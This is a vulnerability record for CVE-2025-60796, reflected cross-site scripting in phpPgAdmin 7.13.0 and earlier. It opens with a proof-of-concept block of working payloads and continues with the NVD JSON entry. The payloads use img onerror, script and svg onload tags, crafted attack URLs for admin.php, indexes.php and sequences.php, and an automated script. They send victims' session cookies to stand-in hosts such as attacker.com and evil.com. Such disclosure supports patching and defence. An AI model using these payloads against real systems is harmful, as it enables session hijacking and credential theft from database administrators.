CVE-2025-60796

<!-- CVE-2025-60796 PoC - phpPgAdmin XSS --> <!-- Admin.php XSS PoC --> <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> <!-- Indexes.php XSS PoC --> <script>new Image().src='https://attacker.com/log?c='+document.cookie;</script> <!-- Sequences.php XSS PoC --> <svg/onload=fetch('https://attacker.com/cookie?c='+btoa(document.cookie))> <!-- Example attack URL (admin.php) --> <!-- https://phppgadmin-host/admin.php?action=<script>document.location='https://attacker.com/steal?c='+document.cookie</script> --> <!-- Example attack URL (indexes.php) --> <!-- https://phppgadmin-host/indexes.php?index=<img src=x onerror=fetch('https://evil.com/?c='+document.cookie)> --> <!-- Example attack URL (sequences.php) --> <!-- https://phppgadmin-host/sequences.php?sequence=<script>new Audio().src='https://attacker.com/pwn?d='+btoa(JSON.stringify({cookie:document.cookie,url:location.href}))</script> --> <!-- Automated PoC (JavaScript) --> (function(){ var targets = [ '/admin.php?action=', '/indexes.php?index=', '/sequences.php?sequence=' ]; var payload = '<script>fetch("https://attacker.com/log?c="+btoa(document.cookie))</script>'; targets.forEach(function(t){ var img = new Image(); img.src = t + encodeURIComponent(payload); }); })();

{"cve": {"id": "CVE-2025-60796", "sourceIdentifier": "[email protected]", "published": "2025-11-20T15:17:38.100", "lastModified": "2025-11-25T19:15:25.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "phpPgAdmin 7.13.0 and earlier contains multiple cross-site scripting (XSS) vulnerabilities across various components. User-supplied input from $_REQUEST parameters is reflected in HTML output without proper encoding or sanitization in multiple locations including sequences.php, indexes.php, admin.php, and other unspecified files. An attacker can exploit these vulnerabilities to execute arbitrary JavaScript in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious actions."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phppgadmin_project:phppgadmin:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.13.0", "matchCriteriaId": "AC3CB38F-12CA-4FA6-98DB-FFCC98F26715"}]}]}], "references": [{"url": "https://github.com/phppgadmin/phppgadmin/blob/master/admin.php#L35", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/phppgadmin/phppgadmin/blob/master/indexes.php#L29", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/phppgadmin/phppgadmin/blob/master/sequences.php#L316", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60796.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}